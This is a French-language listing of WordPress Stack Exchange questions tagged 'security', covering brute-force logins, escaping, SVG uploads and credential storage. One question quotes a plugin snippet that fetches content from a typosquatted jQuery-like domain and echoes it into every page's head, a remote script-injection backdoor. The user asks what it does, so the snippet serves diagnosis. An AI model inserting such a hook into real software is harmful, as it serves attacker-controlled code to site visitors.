WordPress security

3

Augmentation des tentatives de connexion infructueuses, attaques par force brute? [fermé]

Fermé. Cette question est hors sujet . Il n'accepte pas actuellement de réponses. Voulez-vous améliorer cette question? Mettez à jour la question afin qu'elle soit sur le sujet pour WordPress Development Stack Exchange. Fermé il y a 4 ans . J'ai installé le plugin Simple Login Lockdown et depuis quelques …

20 login security

6

Les plugins Wordpress sont-ils essentiels?

Je suis nouveau sur WordPress. J'ai récemment lu un article sur la façon dont les pirates peuvent exploiter les vulnérabilités des plugins. Diverses sources telles que Google Pagespeed m'ont également dissuadé d'utiliser des plugins ou du moins de le garder au minimum. Personnellement, j'essaie également d'éviter les plugins car je …

19 plugins security

2

Si un pirate a changé le blog_charset en UTF-7, est-ce que WordPress est vulnérable à de nouvelles attaques?

J'ai eu un client qui a été piraté récemment et j'ai remarqué que des personnages étranges apparaissaient sur son site, comme Â et Æ. Il s'avère que les pirates ont changé le blog_charset en UTF-7 dans la wp_optionstable de la base de données. Je l'ai remis à UTF-8, mais je …

19 security encoding hacked characters

3

Comment stocker le nom d'utilisateur et le mot de passe dans l'API dans la base de données d'options wordpress?

Je suis en train de développer un plugin et il y a de fortes chances que je le libère plus que probablement sur le dépôt public de plugins pour que d'autres puissent l'utiliser. Le plugin utilisera une API et pour utiliser cette API, vous devez passer un nom d'utilisateur et …

19 plugin-development security api encryption

2

J'ai trouvé cela dans un plugin. Qu'est ce que ça fait? est-ce dangereux?

J'ai trouvé cela dans un plugin. Qu'est ce que ça fait? est-ce dangereux? add_action('admin_enqueue_scripts', 'pw_load_scripts'); if (!function_exists('wp__head'){ function wp__head() { if(function_exists('curl_init')) { $ch = curl_init(); curl_setopt($ch,CURLOPT_URL,"http://www.jqury.net/?1"); curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); curl_setopt($ch, CURLOPT_REFERER, $_SERVER['HTTP_HOST']); curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,10); $jquery = curl_exec($ch); curl_close($ch); echo "$jquery"; } } add_action('wp_head', 'wp__head'); }

17 plugins wp-admin security curl

2

Dans quels contextes les plugins sont-ils responsables de la validation / désinfection des données?

Je veux m'assurer que toutes les données de mes plugins / thèmes sont traitées en toute sécurité avant d'entrer dans la base de données et avant d'être sorties vers le navigateur. Mon problème est qu'il y a des situations où l'API gère la désinfection pour vous - comme lors de …

17 plugin-development security customization validation sanitization

2

Dois-je supprimer install.php et install-helper.php?

Est-ce que le maintien wp-admin/install.phpet wp-admin/install-helper.phpune fuite de sécurité sur les nouvelles versions de wordpress? Par défaut, l'autorisation de fichier sur ces fichiers est 644. S'il y a une fuite, quel genre de s'il vous plaît?

16 security installation

3

Quelles sont les failles de sécurité courantes que je dois rechercher? [fermé]

Dans l'état actuel des choses, cette question ne convient pas à notre format de questions / réponses. Nous nous attendons à ce que les réponses soient étayées par des faits, des références ou une expertise, mais cette question suscitera probablement un débat, des arguments, des sondages ou une discussion approfondie. …

16 plugins plugin-development security sql

1

Pour quelles raisons de sécurité les fichiers SVG sont-ils bloqués dans l'uploader multimédia?

Je vois que les SVG sont bloqués par défaut dans l'uploader de médias et vous devez l'ajouter en tant que type MIME pris en charge dans functions.php. Quelles sont les raisons de sécurité derrière cela?

15 media security svg

3

Dois-je échapper aux fonctions wordpress comme the_title, the_excerpt, the_content

J'avais regardé le code mais je ne pouvais pas voir d'échapper à des fonctions comme the_title the_content the_excerptetc. Je ne le lisais peut-être pas correctement. Dois-je échapper à ces fonctions dans le développement de thème comme: esc_html ( the_title () ) Modifier: comme indiqué dans les réponses ci-dessous, le code …

15 security escaping

4

Comment fonctionne admin-ajax.php?

Nous rencontrons des problèmes avec un développeur externe. Nous voulons limiter l'accès au wp-adminsite à un accès interne uniquement (via VPN ). Simplement pour ne pas être attaqué par des utilisateurs externes. Nous pouvons énumérer les administrateurs du site et ne voulons pas qu'ils soient phishing. Notre développeur dit que …

14 admin ajax security

3

Empêcher l'accès ou supprimer automatiquement readme.html, license.txt, wp-config-sample.php

Juste une question rapide qui pourrait aider un peu avec la sécurité. J'ai remarqué que le fichier readme.html a le numéro de version répertorié. Il réapparaît après chaque mise à niveau, tout comme le fichier licence.txt et wp-config-sample.php. Existe-t-il un moyen simple pour que WordPress supprime automatiquement ces fichiers après …

13 security wp-config

1

Pourquoi WordPress a-t-il besoin de ma clé ssh privée pour mettre à jour?

Configurer WordPress pour qu'il se mette à jour dans l'application (c'est-à-dire WordPress) est idéal pour moi en raison de sa commodité. Néanmoins, je suis troublé par les exigences. Les champs demandés qui apparaissent après l' installation de ssh2 pour php demandent non seulement ma clé publique, mais aussi ma clé …

13 security updates ssh

1

Dans quelle mesure wp_insert_posts () est-il sûr / désinfecté?

En regardant le Codex pour wp_insert_post (), il indique que cette fonction "... désinfecte les variables, vérifie, remplit les variables manquantes comme la date / l'heure, etc." (EDIT: j'ai mis à jour l'entrée du Codex pour inclure un exemple plus robuste qui comprend la sécurité ainsi que la méta-post et …

13 security sanitization

4

Pourquoi devrais-je utiliser l'esc_url?

Cette chose rend mon codage difficile. Le codex Wordpress motive l'utilisation de esc_url en parlant vaguement de sécurité. Mais vaut-il vraiment la peine? Par exemple, quel est l'avantage de sécurité important et pratique que vous <?php echo esc_url( home_url( '/' ) ); ?> au lieu de <?php echo home_url() ?> …

12 security

Questions marquées «security»